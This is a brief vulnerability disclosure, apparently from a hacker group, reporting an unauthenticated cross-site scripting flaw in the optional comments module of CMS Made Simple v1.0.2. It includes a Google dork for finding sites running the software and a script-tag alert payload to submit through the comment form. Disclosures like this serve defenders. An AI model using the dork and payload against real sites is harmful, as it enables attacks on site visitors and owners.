-=(L 0 J 1 K)=-
	       =(D.I.E. Inc.)=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

CMS Made Simple v1.0.2
(all versions with optional comments module installed)

-=(*)=-
Author: L0j1k

-=(*)=-
Class: Remote / Cross-Site Scripting (XSS)

-=(*)=-
Contact: L0j1k[at]L0j1k[dot]com

-=(*)=-
Summary: Optional user comments module does not validate user information (anonymous access) or properly sanitize input (XSS).

-=(*)=-
Googledork: "powered by CMS Made Simple"

-=(*)=-
PoC:

Input the following into user comment form:

<script type="text/javascript">alert('XSS')</script>

-=(*)=-
"Greetz": tr0s, sh3a